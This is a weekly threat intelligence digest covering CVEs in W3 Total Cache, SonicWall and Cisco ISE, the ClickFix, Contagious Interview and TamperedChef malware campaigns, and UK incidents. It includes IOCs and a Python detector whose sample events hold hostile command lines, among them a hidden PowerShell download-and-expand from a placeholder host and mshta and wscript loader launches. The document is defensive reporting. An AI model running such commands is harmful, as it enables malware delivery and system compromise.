Executive Summary
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
WPScan Discloses Critical Command Injection Vulnerability CVE-2025-9501 in W3 Total Cache WordPress Plugin - On October 27, 2025, WPScan disclosed a critical command injection vulnerability tracked as CVE-2025-9501 in the W3 Total Cache WordPress plugin, affecting all versions prior to 2.8.13. The flaw stems from how the “_parse_dynamic_mfunc()” function processes dynamic function calls in cached content. The vulnerability allows unauthenticated threat actors to submit a malicious comment containing a PHP payload that the server executes, potentially enabling full remote code execution and compromising the site.
WPScan scheduled the release of a proof-of-concept exploit for November 24, 2025, following the disclosure timeline. At the time of disclosure, there were no instances of CVE-2025-9501 being exploited in the wild. WPScan recommends that administrators update the W3 Total Cache plugin to version 2.8.13 or later, disable the plugin if patching is not possible, and restrict comment functionality to prevent injection attempts.
SonicWall Patches Stack-Based Buffer Overflow Vulnerability CVE-2025-40601 Affecting Gen7 and Gen8 SonicOS Firewalls - On November 19, 2025, SonicWall patched a stack-based buffer overflow vulnerability tracked as CVE-2025-40601, affecting multiple Gen7 hardware firewalls running versions 7.3.0-7012 and earlier, Gen7 virtual firewalls running versions 7.3.0-7012 and earlier, and Gen8 firewalls running versions 8.0.2-8011 and earlier. Exploitation could allow unauthenticated threat actors to cause a Denial of Service (DoS) condition. At the time of writing, there are no reports of this vulnerability being exploited in the wild.
To prevent threat actors from exploiting CVE-2025-40601, Insikt Group recommends updating Gen7 hardware firewalls and Gen7 virtual firewalls to version 7.3.1-7013 or later, and Gen8 firewalls to version 8.0.3-8011 or later.
Cisco Patches Four Vulnerabilities Affecting Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC); No Active Exploitation Observed - On November 18, 2025, Cisco patched three cross-site scripting (XSS) vulnerabilities and one information disclosure vulnerability affecting Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC) versions 3.1 through 3.4. Fixed versions include 3.2 Patch 8, 3.3 Patch 8 (available December 2025), 3.4 Patch 2, and 3.4 Patch 4. At the time of writing, no active exploitation has been reported.
CVE-2025-20289, CVE-2025-20303, and CVE-2025-20304 are XSS vulnerabilities caused by improper input validation in the web interface of the affected systems. Successful exploitation could allow an authenticated, low-privileged threat actor to inject and execute malicious code in the context of a user’s browser session, potentially exposing sensitive browser-based data.
CVE-2025-20305 is an information disclosure vulnerability in the web-based management interface, caused by the absence of data protection mechanisms for certain files. Successful exploitation could allow an authenticated threat actor with read-only Administrator privileges to access sensitive information, including passwords typically restricted to higher-privileged users.
Potential Threats
Threat Actors Use Fake Windows Update Pages in ClickFix Campaign to Deploy LummaC2 and Rhadamanthys Stealers - On November 24, 2025, Huntress reported that threat actors conducted a ClickFix campaign to deliver the LummaC2 and Rhadamanthys information stealers through an infection chain executed entirely in memory. Since early October 2025, the threat actors have used “Human Verification” and fake “Windows Update” prompts to trick victims into opening the Windows Run box and executing supplied commands. Huntress linked a cluster of Windows Update–themed ClickFix incidents observed between October 1 and 17, 2025, to infrastructure that hosted both the mshta content used in the first stage and the PowerShell payloads delivered in the second stage.
DPRK-Linked “Contagious Interview” Campaign Targets US-Based AI and Cryptocurrency Professionals Using Fake Job Platform - On November 20, 2025, Validin reported that DPRK-linked threat actors launched an advanced variant of the Contagious Interview campaign, targeting US AI and crypto talent. Contagious Interview compromises genuine job seekers by weaponising the job application process itself.
The infection chain begins when the threat actor initiates contact via a LinkedIn message, leading the victim through a staged interview process hosted on a fraudulent platform. The workflow requires the applicant to record a video answer for a fake job. When the applicant attempts to record the video, the platform displays an error message prompting the user to fix their webcam using a helper tool. The lure page abuses a clipboard hijacking script that silently replaces the victim’s copied text with a fully weaponised, multi-stage command. When the victim pastes this command into a terminal and executes it, the infection begins.
Global Malvertising and SEO Campaign “TamperedChef” Targets Healthcare, Construction, and Manufacturing Sectors With JavaScript Payloads - On November 18, 2025, Acronis reported an ongoing global malvertising and SEO campaign dubbed TamperedChef that distributes digitally signed malicious applications to deliver obfuscated JavaScript payloads. The campaign abuses installers disguised as legitimate software to trick victims into downloading the payload. It targets multiple sectors, particularly the healthcare, construction, and manufacturing industries, with victim activity observed across the Americas and other regions, indicating a globally distributed operation. At the time of writing, the threat actor behind this campaign remains unknown.
General News
UK Royal Borough of Kensington and Chelsea and Westminster City Council Disclose Cybersecurity Incident Affecting Shared IT Systems - On November 25, 2025, the UK Royal Borough of Kensington and Chelsea and Westminster City Council disclosed a cybersecurity incident affecting shared information technology systems that also extend to the London Borough of Hammersmith and Fulham. According to the joint statement, the incident disrupted council services, including phone lines.
RBKC and WCC detected the incident on November 24, 2025. In response, both councils engaged the UK National Cyber Security Centre and external experts to support containment and recovery operations. The councils also implemented emergency and business continuity plans to maintain critical services. At the time of writing, no further technical details have been confirmed.
Salesforce and Gainsight Investigate Unusual Activity Involving Connected Applications - On November 23, 2025, Gainsight confirmed it is actively investigating unusual activity involving its applications integrated with Salesforce. Salesforce first reported the activity on November 19, 2025, after detecting API calls through these applications from non-allowlisted IP addresses, which affected three unnamed customers.
In response, Salesforce revoked access tokens associated with Gainsight applications and restricted integration functionality while the investigation continues. Gainsight reported that the incident disrupted its Customer Success, Community, Northpass, Skilljar, and Staircase services, temporarily disabling the functionality to read and write from Salesforce.
Software companies must be held liable for British economic security, say MPs - A lack of liability for software vendors is among the most pressing issues putting Britain’s economic and national security at risk, an influential committee of lawmakers warned on Monday. The report by the Business and Trade Committee says economic threats facing the United Kingdom are multiplying and, in the years ahead, will grow exponentially, leading to a huge increase in the private ownership of public risk.
While calling on the government to take action to manage these threats more broadly, the committee identified three specific measures to address cybersecurity risks: introducing liability for software developers, incentivising business investment in cyber resilience, and mandatory reporting following a malicious cyber incident.
The report follows a series of cyber incidents in the U.K., including a cyberattack on Jaguar Land Rover, which the committee’s chair Liam Byrne described as “a cyber shockwave ripping through our industrial heartlands”.
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and together determine the group's severity rating. These updates can be seen below.

Legend: ● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity

| Threat Actor | Severity Increase (previous → current) | Opportunity (previous → current) | Intent (previous → current) |
|---|---|---|---|
| PlushDaemon | NEW → ● Basic | NEW → ● 40 | NEW → ● 25 |
| monkeybiz | NEW → ● Basic | NEW → ● 40 | NEW → ● 25 |
| 0x1 | NEW → ● Basic | NEW → ● 35 | NEW → ● 5 |
| 7TEAMS | NEW → ● Basic | NEW → ● 30 | NEW → ● 5 |
| World Leaks Ransomware Group | ● Basic → ● Basic | ● 25 → ● 49 | ● 49 → ● 49 |
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.
The spikes in references are calculated over 60 days and are normalised to ensure they aren't disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲ Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
▲ Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
| Attackers | Methods | Vulnerabilities | Targets |
|---|---|---|---|
| World Leaks ▲ | SocGholish ▲ | CVE-2016-5195 ▲ | London ▲ |
| PayOutSking ▲ | T1071.001 ▲ | CVE-2025-21479 ▲ | JPMorganChase ▲ |
| Hunters International ▲ | Play Ransomware ▲ | CVE-2025-62215 ▲ | Real Estate ▲ |
| Network Battalion 65 ▲ | T1059.001 ▲ | CVE-2025-6389 ▲ | Asset Management ▲ |
| s*****e ▲ | Shai Hulud ▲ | CVE-2024-21944 ▲ | Maritime ▲ |
Prominent Information Security Events
DPRK-Linked "Contagious Interview" Campaign Targets US-Based AI and Cryptocurrency Professionals Using Fake Job Platform
Source: Insikt Group | Validated Intelligence Event
IOC: IP - 72.61.9.45
IOC: URL - assureeval[.]com
On November 20, 2025, Validin reported that DPRK-linked threat actors launched an advanced variant of the “Contagious Interview” campaign (tracked as PurpleBravo by Recorded Future), targeting US AI and crypto talent. Contagious Interview compromises genuine job seekers by weaponising the job application process itself.
The infection chain begins when the threat actor initiates contact via a LinkedIn message, leading the victim through a staged interview process hosted on a fraudulent platform. The workflow requires the applicant to record a video answer for a fake job. When the applicant attempts to record the video, the platform displays an error message prompting the user to “fix” their webcam using a helper tool (the ClickFix technique). The lure page abuses a clipboard hijacking script that silently replaces the victim’s copied text with a fully weaponised, multi-stage command. When the victim pastes this command into a terminal and executes it, the infection begins. The command first downloads a fraudulent Microsoft Driver Update, then retrieves a secondary malicious ZIP archive from an attacker-controlled domain, expands the archive via PowerShell, and finally executes a VBScript loader via wscript.exe to finalise the system compromise.
According to a previous Insikt Group Analyst Note dated November 18, 2025, DPRK threat actors expanded the Contagious Interview campaign by using public JSON hosting services to deliver malicious payloads. These operations used trojanized Node.js code shared on GitLab, which executed the BeaverTail infostealer to collect system metadata, screenshots, and cryptocurrency wallet credentials. BeaverTail then downloaded the InvisibleFerret Remote Access Trojan (RAT) from the C2 server, leading to the subsequent execution of the Tsunami tool set. Both reports document the DPRK’s continuous evolution of the Contagious Interview campaign, highlighting consistent targeting of technical talent and an increased sophistication in malware delivery and social engineering.
Global Malvertising and SEO Campaign "TamperedChef" Targets Healthcare, Construction, and Manufacturing Sectors with JavaScript Payloads
Source: Insikt Group | Validated Intelligence Event
IOC: Hash - 8ecd3c8c126be7128bf654456d171284f03e4f212c27e1b33f875b8907a7bc65
IOC: Domain - api.78kwijczjz0mcig0f0[.]com
On November 18, 2025, Acronis reported an ongoing global malvertising and SEO campaign dubbed “TamperedChef” that distributes digitally signed malicious applications to deliver obfuscated JavaScript payloads. The campaign abuses installers disguised as legitimate software to trick victims into downloading the payload. The campaign targets multiple sectors, particularly the healthcare, construction, and manufacturing industries, with victim activity observed across the Americas and other regions, indicating a globally distributed operation. At the time of writing, the threat actor behind this campaign remains unknown.
The infection chain begins with malvertising and SEO-optimised websites that lead victims to fake download pages hosting signed downloaders. Once executed, the downloader drops an XML file, task.xml, that configures a scheduled task to fetch and run an obfuscated JavaScript payload. This payload establishes persistence, communicates with hardcoded command-and-control servers via encrypted HTTPS requests, and enables remote code execution. The campaign’s infrastructure primarily relies on domains registered through common registrars with privacy protection services and short registration lifespans to evade takedowns. The threat actors behind this campaign continuously rotate certificates issued under disposable LLCs, such as Native Click Marketing LLC and Unified Market Group LLC, to maintain credibility and avoid detection.
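The ClickFix, Contagious Interview and TamperedChef chains above all end in a Windows script host or LOLBin being launched with a command line a defender can inspect. As an added example (not code from Huntress, Validin, Acronis or Insikt Group), the following Python detector runs over constructed process-creation records and flags those patterns: mshta.exe launched from the Run box with a remote URL, PowerShell fetching and expanding an archive, wscript.exe running a loader from a user-writable path, and schtasks.exe registering a task from an XML definition. The rule names, the `ProcEvent` shape and the assumption that the dropper registers task.xml via schtasks.exe are the author's own, not vendor signatures.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str    # parent image name, e.g. explorer.exe (Run box launches)
    image: str     # child image name
    cmdline: str   # full command line as logged


# Constructed heuristics for this example; tune paths to the environment.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|ProgramData|Public)\\", re.I)
REMOTE_URI = re.compile(r"https?://", re.I)
PS_FETCH = re.compile(r"Expand-Archive|iwr|Invoke-WebRequest|DownloadString", re.I)
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse)\b", re.I)


def classify(ev: ProcEvent) -> list[str]:
    """Return the rule names this event matches (empty list if nothing fires)."""
    hits, img, parent, cmd = [], ev.image.lower(), ev.parent.lower(), ev.cmdline
    # ClickFix first stage: command typed into the Run box, so explorer spawns mshta with a URL.
    if img == "mshta.exe" and parent == "explorer.exe" and REMOTE_URI.search(cmd):
        hits.append("clickfix_mshta_remote")
    # Run-box PowerShell that downloads and/or expands an archive in a single command.
    if img == "powershell.exe" and parent == "explorer.exe" and PS_FETCH.search(cmd):
        hits.append("runbox_powershell_fetch")
    # Loader stage: wscript executing a script dropped under a user-writable directory.
    if img == "wscript.exe" and USER_WRITABLE.search(cmd) and SCRIPT_EXT.search(cmd):
        hits.append("wscript_user_path_loader")
    # Persistence: scheduled task created from an XML definition (assumed schtasks.exe path).
    if img == "schtasks.exe" and re.search(r"/create\b", cmd, re.I) and re.search(r"/xml\b", cmd, re.I):
        hits.append("schtasks_xml_create")
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[str, list[str]]]:
    """Return (image, matched rules) for every event that matched at least one rule."""
    return [(ev.image, classify(ev)) for ev in events if classify(ev)]


# Constructed sample telemetry (not real events): one line per pattern plus a benign mshta launch.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "mshta.exe", "mshta.exe https://example.invalid/verify"),
    ProcEvent("explorer.exe", "powershell.exe",
              r'powershell -w hidden -c "iwr https://example.invalid/u.zip -OutFile $env:TEMP\u.zip; Expand-Archive $env:TEMP\u.zip"'),
    ProcEvent("powershell.exe", "wscript.exe", r"wscript.exe C:\Users\u\AppData\Local\Temp\drv\update.vbs"),
    ProcEvent("setup.exe", "schtasks.exe", r"schtasks.exe /create /tn Updater /xml C:\Users\u\AppData\Local\task.xml"),
    ProcEvent("explorer.exe", "mshta.exe", r"mshta.exe C:\Windows\System32\about.hta"),
]

if __name__ == "__main__":
    for image, rules in scan(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(rules)}")
```

The benign local-path mshta launch produces no hit, which is the point of tying each rule to the parent process and the remote or user-writable argument rather than to the binary name alone.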
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
- CVE-2025-9501: This vulnerability can be remediated by updating the W3 Total Cache plugin to version 2.8.13 or later. If updating is not possible, disabling the plugin and restricting comment functionality is recommended.
- CVE-2025-40601: We recommend upgrading affected Gen7 and Gen8 SonicOS firewalls to the latest patched firmware versions to prevent potential exploitation.
- CVE-2025-20289 / CVE-2025-20303 / CVE-2025-20304 / CVE-2025-20305: These vulnerabilities can be addressed by updating Cisco ISE and ISE-PIC to the most recent fixed patch levels for versions 3.2, 3.3, and 3.4.
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.